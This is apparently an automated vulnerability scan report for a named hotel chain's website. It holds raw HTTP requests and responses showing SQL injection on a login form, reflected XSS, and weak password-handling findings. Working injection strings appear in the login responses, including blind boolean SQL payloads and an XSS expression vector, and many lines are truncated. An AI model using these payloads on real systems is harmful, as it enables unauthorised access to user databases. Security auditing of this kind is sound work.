1.1. http://www.kimptonhotels.com/development/login.aspx [uname parameter]
1.2. http://www.kimptonhotels.com/development/login.aspx [uname parameter]
2. Cross-site scripting (reflected)
3. Cookie without HttpOnly flag set
4. Password field with autocomplete enabled
4.1. http://www.kimptonhotels.com/
4.2. http://www.kimptonhotels.com/development/future-development.aspx
4.3. http://www.kimptonhotels.com/development/kimpton-development.aspx
4.4. http://www.kimptonhotels.com/development/management-services.aspx
4.5. http://www.kimptonhotels.com/hotels/factsheets/nine-zero-hotel-boston/
4.6. http://www.kimptonhotels.com/hotels/hotels-boston.aspx
4.7. http://www.kimptonhotels.com/hotels/hotels.aspx
4.8. http://www.kimptonhotels.com/programs/red-ribbon.aspx
5. Cleartext submission of password
5.1. http://www.kimptonhotels.com/
5.2. http://www.kimptonhotels.com/development/future-development.aspx
5.3. http://www.kimptonhotels.com/development/kimpton-development.aspx
5.4. http://www.kimptonhotels.com/development/management-services.aspx
5.5. http://www.kimptonhotels.com/hotels/factsheets/nine-zero-hotel-boston/
5.6. http://www.kimptonhotels.com/hotels/hotels-boston.aspx
5.7. http://www.kimptonhotels.com/hotels/hotels.aspx
5.8. http://www.kimptonhotels.com/programs/red-ribbon.aspx
7. Cross-domain script include
8.1. http://www.kimptonhotels.com/development/future-development.aspx
8.2. http://www.kimptonhotels.com/development/management-services.aspx
8.3. http://www.kimptonhotels.com/hotels/factsheets/nine-zero-hotel-boston/
10. HTML does not specify charset
11. Content type incorrectly stated
11.1. http://www.kimptonhotels.com/hotels/factsheets/nine-zero-hotel-boston/_js/slideshow.js
11.2. http://www.kimptonhotels.com/hotels/factsheets/nine-zero-hotel-boston/images/ko_prime_logo.gif
Severity: | High |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /development/login.aspx |
POST /development/login.aspx HTTP/1.1 Referer: http://www.kimptonhotels User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vuln Crawler http://cloudscan.me) Cache-Control: no-cache Content-Type: application/x-www-form Host: www.kimptonhotels.com Cookie: ASP.NET_SessionId Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Content-Length: 340 __EVENTARGUMENT=3&_ |
HTTP/1.1 200 OK Date: Thu, 21 Oct 2010 21:09:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 4699 <!-- %@ import Namespace="MySql.Data <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Standards Login</title> < ...[SNIP]... <br />ERROR [42000] [MySQL][ODBC 5.1 Driver][mysqld-5.0.83 ...[SNIP]... |
POST /development/login.aspx HTTP/1.1 Referer: http://www.kimptonhotels User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vuln Crawler http://cloudscan.me) Cache-Control: no-cache Content-Type: application/x-www-form Host: www.kimptonhotels.com Cookie: ASP.NET_SessionId Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Content-Length: 340 __EVENTARGUMENT=3&_ |
HTTP/1.1 200 OK Date: Thu, 21 Oct 2010 21:09:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 4420 <!-- %@ import Namespace="MySql.Data <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Standards Login</title> < ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://www.kimptonhotels |
Path: | /development/login.aspx |
POST /development/login.aspx HTTP/1.1 Referer: http://www.kimptonhotels User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vuln Crawler http://cloudscan.me) Cache-Control: no-cache Content-Type: application/x-www-form Host: www.kimptonhotels.com Accept-Encoding: gzip, deflate Content-Length: 330 __EVENTARGUMENT=3&_ |
HTTP/1.1 200 OK Date: Thu, 21 Oct 2010 21:11:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 4232 <!-- %@ import Namespace="MySql.Data <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Standards Login</title> < ...[SNIP]... <td colspan="2"></td> </tr> <tr> <td width="100"> <p style="margin: 10px 0 0 6px;"> <strong>Username</strong> <span id="runame" class="required" style="color:Red </p> </td> <td><input name="uname" type="text" id="uname" size="38" style="margin: 10px 0 0 0;" /></td> </tr> <tr valign="top"> <td width="100"> <p style="margin: 0 0 0 6px;"> <strong>Password</strong> <span id="rpword" class="required" style="color:Red </p> </td> <td><input name="pword" type="text" id="pword" size="38" style="margin: 10px 0 0 0;" /></td> </tr> <tr> <td colspan="2"><input type="submit" name="submitbutton" value="Login" onclick="javascript </tr> </table> <script type="text/javascript"> //<![CDATA[ var Page_Validators = new Array(document.getEl //]]> </script> <script type="text/javascript"> //<![CDATA[ var runame = document.all ? document.all["runame"] : document.getElementById( runame.controltovalidate = "uname"; runame.errormessage = "Required"; runame.evaluationfunction = "RequiredFieldValida runame.initialvalue = ""; var rpword = document.all ? document.all["rpword"] : document.getElementById( rpword.controltovalidate = "pword"; rpword.errormessage = "Required"; rpword.evaluationfunction = "RequiredFieldValida rpword.initialvalue = ""; //]]> </script> <script type="text/javascript"> //<![CDATA[ var Page_ValidationActive = false; if (typeof(ValidatorOnLoad) == "function") { ValidatorOnLoad(); } function ValidatorOnSubmit() { if (Page_ValidationActive) { return ValidatorCommonOnSubmit() } else { ...[SNIP]... |
POST /development/login.aspx HTTP/1.1 Referer: http://www.kimptonhotels User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vuln Crawler http://cloudscan.me) Cache-Control: no-cache Content-Type: application/x-www-form Host: www.kimptonhotels.com Accept-Encoding: gzip, deflate Content-Length: 330 __EVENTARGUMENT=3&_ |
HTTP/1.1 200 OK Date: Thu, 21 Oct 2010 21:11:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 4430 <!-- %@ import Namespace="MySql.Data <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Standards Login</title> < ...[SNIP]... <td colspan="2">Your username and/or password was not found in the system.</td> </tr> <tr> <td width="100"> <p style="margin: 10px 0 0 6px;"> <strong>Username</strong> <span id="runame" class="required" style="color:Red </p> </td> <td><input name="uname" type="text" value="Ronald Smith62384773' or 1=2-- " id="uname" size="38" style="margin: 10px 0 0 0;" /></td> </tr> <tr valign="top"> <td width="100"> <p style="margin: 0 0 0 6px;"> <strong>Password</strong> <span id="rpword" class="required" style="color:Red </p> </td> <td><input name="pword" type="text" value="-1'OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII </tr> <tr> <td colspan="2"><input type="submit" name="submitbutton" value="Login" onclick="javascript </tr> </table> <script type="text/javascript"> //<![CDATA[ var Page_Validators = new Array(document.getEl //]]> </script> <script type="text/javascript"> //<![CDATA[ var runame = document.all ? document.all["runame"] : document.getElementById( runame.controltovalidate = "uname"; runame.errormessage = "Required"; runame.evaluationfunction = "RequiredFieldValida runame.initialvalue = ""; var rpword = document.all ? document.all["rpword"] : document.getElementById( rpword.controltovalidate = "pword"; rpword.errormessage = "Required"; rpword.evaluationfunction = "RequiredFieldValida rpword.initialvalue = ""; //]]> </script> <script type="text/javascript"> //<![CDATA[ var Page_ValidationActive = false; if (typ ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /development/login.aspx |
POST /development/login.aspx HTTP/1.1 Referer: http://www.kimptonhotels User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vuln Crawler http://cloudscan.me) Cache-Control: no-cache Content-Type: application/x-www-form Host: www.kimptonhotels.com Accept-Encoding: gzip, deflate Content-Length: 330 __EVENTARGUMENT=3&_ |
HTTP/1.1 200 OK Date: Thu, 21 Oct 2010 21:06:33 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 4737 <!-- %@ import Namespace="MySql.Data <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Standards Login</title> < ...[SNIP]... <78),1,2))-- e0d6d style=x:expression(alert ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.kimptonhotels |
Path: | /development/development |
GET /development/development Host: www.kimptonhotels.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.kimptonhotels Cookie: WT_FPC=id=174.121.222.18 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 21:00:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 2912 Content-Type: text/html Set-Cookie: ASPSESSIONIDQSBADAST Cache-control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Standards Login</title> <link rel="stylesheet" type="text/css" href="../_css/global.css" <style type="tex ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | / |
GET / HTTP/1.1 Host: www.kimptonhotels.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Thu, 21 Oct 2010 20:16:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 68980 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Hotels: Boutique Hotels, Luxury Travel and Chef-Driven Gourmet Restaurants</title> <meta http-equiv=" ...[SNIP]... <!-- KIT SIGN-IN --> <form name="inTouchSignInform" method="POST" action="/intouch <div id="inTouchSignIn"> ...[SNIP]... </label> <input type="password" name="strPass" id="kitPw" size="20" /> <input type="image" class="submit" src="/assets/btn_miniapp ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /development/future |
GET /development/future Host: www.kimptonhotels.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.kimptonhotels Cookie: WT_FPC=id=174.121.222.18 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 21:00:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 74470 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Hotels & Restaurants - Development - Future Development</title> <meta http-equiv="Content-Type" c ...[SNIP]... <!-- KIT SIGN-IN --> <form name="inTouchSignInform" method="POST" action="/intouch <div id="inTouchSignIn"> ...[SNIP]... </label> <input type="password" name="strPass" id="kitPw" size="20" /> <input type="image" class="submit" src="/assets/btn_miniapp ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /development/kimpton |
GET /development/kimpton Host: www.kimptonhotels.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.kimptonhotels Cookie: WT_FPC=id=174.121.222.18 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 21:00:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 68973 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Hotels & Restaurants - Kimpton Development</title> <meta http-equiv="Content-Type" content="text/ ...[SNIP]... <!-- KIT SIGN-IN --> <form name="inTouchSignInform" method="POST" action="/intouch <div id="inTouchSignIn"> ...[SNIP]... </label> <input type="password" name="strPass" id="kitPw" size="20" /> <input type="image" class="submit" src="/assets/btn_miniapp ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /development/management |
GET /development/management Host: www.kimptonhotels.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.kimptonhotels Cookie: WT_FPC=id=174.121.222.18 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 21:00:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 69668 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Kimpton Hotels & Restaurants - Development - Management Services</title><meta http-equiv="Content-Type" conte ...[SNIP]... <!-- KIT SIGN-IN --> <form name="inTouchSignInform" method="POST" action="/intouch <div id="inTouchSignIn"> ...[SNIP]... </label> <input type="password" name="strPass" id="kitPw" size="20" /> <input type="image" class="submit" src="/assets/btn_miniapp ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /hotels/factsheets/nine |
GET /hotels/factsheets/nine Host: www.kimptonhotels.com Proxy-Connection: keep-alive Referer: http://www.kimptonhotels Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Thu, 21 Oct 2010 20:20:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 190994 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Hotels: Boutique Hotels and Luxury Travel</title> <meta content="text/html; charset=iso-8859-1" http- ...[SNIP]... <!-- KIT SIGN-IN --> <form name="inTouchSignInform" method="POST" action="/intouch <div id="inTouchSignIn"> ...[SNIP]... </label> <input type="password" name="strPass" id="kitPw" size="20" /> <input type="image" class="submit" src="/assets/btn_miniapp ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /hotels/hotels-boston |
GET /hotels/hotels-boston Host: www.kimptonhotels.com Proxy-Connection: keep-alive Referer: http://www.kimptonhotels Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Thu, 21 Oct 2010 20:20:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 75808 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Hotels: Boutique Hotels and Luxury Travel - Boston Hotels</title> <meta http-equiv="Content-Type" con ...[SNIP]... <!-- KIT SIGN-IN --> <form name="inTouchSignInform" method="POST" action="/intouch <div id="inTouchSignIn"> ...[SNIP]... </label> <input type="password" name="strPass" id="kitPw" size="20" /> <input type="image" class="submit" src="/assets/btn_miniapp ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /hotels/hotels.aspx |
GET /hotels/hotels.aspx HTTP/1.1 Host: www.kimptonhotels.com Proxy-Connection: keep-alive Referer: http://www.kimptonhotels Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Thu, 21 Oct 2010 20:19:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 188414 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Hotels: Boutique Hotels and Luxury Travel</title> <meta http-equiv="Content-Type" content="text/html; ...[SNIP]... <!-- KIT SIGN-IN --> <form name="inTouchSignInform" method="POST" action="/intouch <div id="inTouchSignIn"> ...[SNIP]... </label> <input type="password" name="strPass" id="kitPw" size="20" /> <input type="image" class="submit" src="/assets/btn_miniapp ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /programs/red-ribbon.aspx |
GET /programs/red-ribbon.aspx HTTP/1.1 Host: www.kimptonhotels.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.121.222.18 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 20:18:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 88716 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Hotels & Restaurants - Kimpton Programs - Kimpton Cares</title> <meta http-equiv="Content-Type" c ...[SNIP]... <!-- KIT SIGN-IN --> <form name="inTouchSignInform" method="POST" action="/intouch <div id="inTouchSignIn"> ...[SNIP]... </label> <input type="password" name="strPass" id="kitPw" size="20" /> <input type="image" class="submit" src="/assets/btn_miniapp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | / |
GET / HTTP/1.1 Host: www.kimptonhotels.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Thu, 21 Oct 2010 20:16:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 68980 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Hotels: Boutique Hotels, Luxury Travel and Chef-Driven Gourmet Restaurants</title> <meta http-equiv=" ...[SNIP]... <!-- KIT SIGN-IN --> <form name="inTouchSignInform" method="POST" action="/intouch <div id="inTouchSignIn"> ...[SNIP]... </label> <input type="password" name="strPass" id="kitPw" size="20" /> <input type="image" class="submit" src="/assets/btn_miniapp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /development/future |
GET /development/future Host: www.kimptonhotels.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.kimptonhotels Cookie: WT_FPC=id=174.121.222.18 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 21:00:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 74470 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Hotels & Restaurants - Development - Future Development</title> <meta http-equiv="Content-Type" c ...[SNIP]... <!-- KIT SIGN-IN --> <form name="inTouchSignInform" method="POST" action="/intouch <div id="inTouchSignIn"> ...[SNIP]... </label> <input type="password" name="strPass" id="kitPw" size="20" /> <input type="image" class="submit" src="/assets/btn_miniapp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /development/kimpton |
GET /development/kimpton Host: www.kimptonhotels.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.kimptonhotels Cookie: WT_FPC=id=174.121.222.18 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 21:00:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 68973 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Hotels & Restaurants - Kimpton Development</title> <meta http-equiv="Content-Type" content="text/ ...[SNIP]... <!-- KIT SIGN-IN --> <form name="inTouchSignInform" method="POST" action="/intouch <div id="inTouchSignIn"> ...[SNIP]... </label> <input type="password" name="strPass" id="kitPw" size="20" /> <input type="image" class="submit" src="/assets/btn_miniapp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /development/management |
GET /development/management Host: www.kimptonhotels.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.kimptonhotels Cookie: WT_FPC=id=174.121.222.18 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 21:00:40 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 69668 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><title>Kimpton Hotels & Restaurants - Development - Management Services</title><meta http-equiv="Content-Type" conte ...[SNIP]... <!-- KIT SIGN-IN --> <form name="inTouchSignInform" method="POST" action="/intouch <div id="inTouchSignIn"> ...[SNIP]... </label> <input type="password" name="strPass" id="kitPw" size="20" /> <input type="image" class="submit" src="/assets/btn_miniapp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /hotels/factsheets/nine |
GET /hotels/factsheets/nine Host: www.kimptonhotels.com Proxy-Connection: keep-alive Referer: http://www.kimptonhotels Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Thu, 21 Oct 2010 20:20:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 190994 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Hotels: Boutique Hotels and Luxury Travel</title> <meta content="text/html; charset=iso-8859-1" http- ...[SNIP]... <!-- KIT SIGN-IN --> <form name="inTouchSignInform" method="POST" action="/intouch <div id="inTouchSignIn"> ...[SNIP]... </label> <input type="password" name="strPass" id="kitPw" size="20" /> <input type="image" class="submit" src="/assets/btn_miniapp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /hotels/hotels-boston |
GET /hotels/hotels-boston Host: www.kimptonhotels.com Proxy-Connection: keep-alive Referer: http://www.kimptonhotels Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Thu, 21 Oct 2010 20:20:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 75808 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Hotels: Boutique Hotels and Luxury Travel - Boston Hotels</title> <meta http-equiv="Content-Type" con ...[SNIP]... <!-- KIT SIGN-IN --> <form name="inTouchSignInform" method="POST" action="/intouch <div id="inTouchSignIn"> ...[SNIP]... </label> <input type="password" name="strPass" id="kitPw" size="20" /> <input type="image" class="submit" src="/assets/btn_miniapp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /hotels/hotels.aspx |
GET /hotels/hotels.aspx HTTP/1.1 Host: www.kimptonhotels.com Proxy-Connection: keep-alive Referer: http://www.kimptonhotels Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Thu, 21 Oct 2010 20:19:56 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 188414 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Hotels: Boutique Hotels and Luxury Travel</title> <meta http-equiv="Content-Type" content="text/html; ...[SNIP]... <!-- KIT SIGN-IN --> <form name="inTouchSignInform" method="POST" action="/intouch <div id="inTouchSignIn"> ...[SNIP]... </label> <input type="password" name="strPass" id="kitPw" size="20" /> <input type="image" class="submit" src="/assets/btn_miniapp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /programs/red-ribbon.aspx |
GET /programs/red-ribbon.aspx HTTP/1.1 Host: www.kimptonhotels.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.121.222.18 |
HTTP/1.1 200 OK Connection: close Date: Thu, 21 Oct 2010 20:18:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 88716 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Hotels & Restaurants - Kimpton Programs - Kimpton Cares</title> <meta http-equiv="Content-Type" c ...[SNIP]... <!-- KIT SIGN-IN --> <form name="inTouchSignInform" method="POST" action="/intouch <div id="inTouchSignIn"> ...[SNIP]... </label> <input type="password" name="strPass" id="kitPw" size="20" /> <input type="image" class="submit" src="/assets/btn_miniapp ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /hotels/factsheets/nine |
GET /hotels/factsheets/nine Host: www.kimptonhotels.com Proxy-Connection: keep-alive Referer: http://www.kimptonhotels Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Thu, 21 Oct 2010 20:20:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 190994 <!doctype html public "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Kimpton Hotels: Boutique Hotels and Luxury Travel</title> <meta content="text/html; charset=iso-8859-1" http- ...[SNIP]... </div> <form action="http://www <table bgcolor="#dcdcdc" border="0"> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.kimptonhotels |
Path: | /hotels/factsheets/nine |
